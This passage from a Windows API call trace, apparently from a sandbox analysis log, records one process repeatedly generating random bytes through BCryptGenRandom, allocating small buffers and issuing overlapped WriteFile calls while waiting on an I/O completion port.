hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.774] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2060, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.822] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.822] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.823] free (_Block=0x3e305b8) [0179.823] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.823] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.823] free (_Block=0x1fa91d0) [0179.823] free (_Block=0x1fa2ed8) [0179.823] free (_Block=0x1fa90b8) [0179.823] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0179.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.833] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.834] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.834] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.834] free (_Block=0x3e305b8) [0179.834] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.834] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.835] free (_Block=0x1fa91d0) [0179.835] free (_Block=0x1fa2ed8) [0179.835] free (_Block=0x1fa90b8) [0179.835] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.846] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.846] free (_Block=0x3e305b8) [0179.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.846] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.846] free (_Block=0x1fa91d0) [0179.847] free (_Block=0x1fa2ed8) [0179.847] free (_Block=0x1fa90b8) [0179.847] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.857] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.857] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.857] free (_Block=0x3e305b8) [0179.857] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.857] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.858] free (_Block=0x1fa91d0) [0179.858] free (_Block=0x1fa2ed8) [0179.858] free (_Block=0x1fa90b8) [0179.858] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.869] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.869] free (_Block=0x3e305b8) [0179.869] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.869] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.869] free (_Block=0x1fa91d0) [0179.869] free (_Block=0x1fa2ed8) [0179.869] free (_Block=0x1fa90b8) [0179.870] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.899] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.899] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.899] free (_Block=0x3e305b8) [0179.899] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.899] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.900] free (_Block=0x1fa91d0) [0179.900] free (_Block=0x1fa2ed8) [0179.900] free (_Block=0x1fa90b8) [0179.900] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.927] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.927] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.927] free (_Block=0x3e305b8) [0179.927] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.927] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.927] free (_Block=0x1fa91d0) [0179.927] free (_Block=0x1fa2ed8) [0179.927] free (_Block=0x1fa90b8) [0179.927] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.342] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.342] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.342] free (_Block=0x3e305b8) [0180.342] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.342] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.342] free (_Block=0x1fa91d0) [0180.342] free (_Block=0x1fa2ed8) [0180.342] free (_Block=0x1fa90b8) [0180.342] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0180.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.353] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.353] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.353] free (_Block=0x3e305b8) [0180.353] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.353] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.353] free (_Block=0x1fa91d0) [0180.353] free (_Block=0x1fa2ed8) [0180.353] free (_Block=0x1fa90b8) [0180.353] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.362] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.362] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.362] free (_Block=0x3e305b8) [0180.362] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.362] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.362] free (_Block=0x1fa91d0) [0180.362] free (_Block=0x1fa2ed8) [0180.362] free (_Block=0x1fa90b8) [0180.362] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.371] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.371] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.371] free (_Block=0x3e305b8) [0180.371] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.371] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.371] free (_Block=0x1fa91d0) [0180.371] free (_Block=0x1fa2ed8) [0180.371] free (_Block=0x1fa90b8) [0180.371] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.380] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.380] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.380] free (_Block=0x3e305b8) [0180.380] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.380] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.380] free (_Block=0x1fa91d0) [0180.380] free (_Block=0x1fa2ed8) [0180.380] free (_Block=0x1fa90b8) [0180.380] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.406] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.488] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.488] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.488] free (_Block=0x3e305b8) [0180.488] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.488] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.488] free (_Block=0x1fa91d0) [0180.488] free (_Block=0x1fa2ed8) [0180.488] free (_Block=0x1fa90b8) [0180.489] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.844] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.844] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.844] free (_Block=0x3e305b8) [0180.844] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.844] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.844] free (_Block=0x1fa91d0) [0180.844] free (_Block=0x1fa2ed8) [0180.844] free (_Block=0x1fa90b8) [0180.844] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.893] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.893] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.894] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.894] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.894] free (_Block=0x3e305b8) [0180.894] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.894] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0180.894] free (_Block=0x1fa91d0) [0180.894] free (_Block=0x1fa2ed8) [0180.894] free (_Block=0x1fa90b8) [0180.894] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0180.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0180.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0180.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0180.907] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0180.907] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0180.908] free (_Block=0x3e305b8) [0180.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0180.908] calloc 